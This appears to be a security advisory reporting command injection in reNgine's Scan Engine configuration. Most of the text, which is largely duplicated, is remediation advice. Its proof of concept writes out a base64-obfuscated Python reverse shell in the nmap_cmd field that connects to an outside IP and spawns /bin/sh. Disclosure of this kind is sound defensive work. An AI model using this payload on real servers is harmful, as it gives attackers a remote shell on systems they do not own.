Summary
Person can be exploit Command Injection through Scan Engine config, I changed nmap_cmd parameters with payload. After ı scanned target with this scan engine
Details
Thanks to this vulnerability, the attacker can run commands on the server and get a shell.
PoC
- Login the REngine
- click the Scan Engine
- Edit any Scan Engine except of Osint
- modify Scan Engine I changed nmap_cmd parameters with this payload 'nmap_cmd': 'echo "cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxvcyxwdHk7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMjQ0LjE1MC42OSIsNjE2MTIpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7b3MuZHVwMihzLmZpbGVubygpLDEpO29zLmR1cDIocy5maWxlbm8oKSwyKTtwdHkuc3Bhd24oIi9iaW4vc2giKScg"|base64 --decode |/bin/sh #'
- add target and scan this engine.
Impact
I got up Shell
Remediation
Input Validation: Ensure that any user-controlled input used to construct commands is strictly validated. For example, only allow predefined commands or safe inputs, such as whitelisted arguments, to be passed.
python
import shlex
Example of sanitizing input using shlex to split commands safely
command = shlex.split(user_input)
Avoid Shell=True: When using subprocess.Popen(), ensure the shell=True option is not used unless absolutely necessary. This option can increase the risk of command injection because the input will be executed within the shell.
python
Avoid shell=True, use direct arguments
process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
Escape Input Properly: If you're constructing a command from user input, use escaping techniques or utility libraries to prevent special characters (like &, ;, |) from being interpreted as part of the command.
python
import shlex
command = shlex.quote(user_input) # Escapes user input properly
Use Secure Libraries: Where possible, avoid manually invoking shell commands using subprocess. Use high-level libraries or APIs that offer functionality without needing to execute shell commands. For example, if you're interacting with the file system, Python's os or pathlib modules offer safe file manipulation functions.
python
import os
Instead of running a shell command to check if a file exists:
subprocess.Popen(['test', '-e', file_path])
Use Python's built-in functions:
if os.path.exists(file_path):
Perform action
gonzaless95 Reporter
Summary
Person can be exploit Command Injection through Scan Engine config, I changed nmap_cmd parameters with payload. After ı scanned target with this scan engine
Details
Thanks to this vulnerability, the attacker can run commands on the server and get a shell.
PoC
Impact
I got up Shell
Remediation
Input Validation: Ensure that any user-controlled input used to construct commands is strictly validated. For example, only allow predefined commands or safe inputs, such as whitelisted arguments, to be passed.
python
import shlex
Example of sanitizing input using shlex to split commands safely
command = shlex.split(user_input)
Avoid Shell=True: When using subprocess.Popen(), ensure the shell=True option is not used unless absolutely necessary. This option can increase the risk of command injection because the input will be executed within the shell.
python
Avoid shell=True, use direct arguments
process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
Escape Input Properly: If you're constructing a command from user input, use escaping techniques or utility libraries to prevent special characters (like &, ;, |) from being interpreted as part of the command.
python
import shlex
command = shlex.quote(user_input) # Escapes user input properly
Use Secure Libraries: Where possible, avoid manually invoking shell commands using subprocess. Use high-level libraries or APIs that offer functionality without needing to execute shell commands. For example, if you're interacting with the file system, Python's os or pathlib modules offer safe file manipulation functions.
python
import os
Instead of running a shell command to check if a file exists:
subprocess.Popen(['test', '-e', file_path])
Use Python's built-in functions:
if os.path.exists(file_path):
Perform action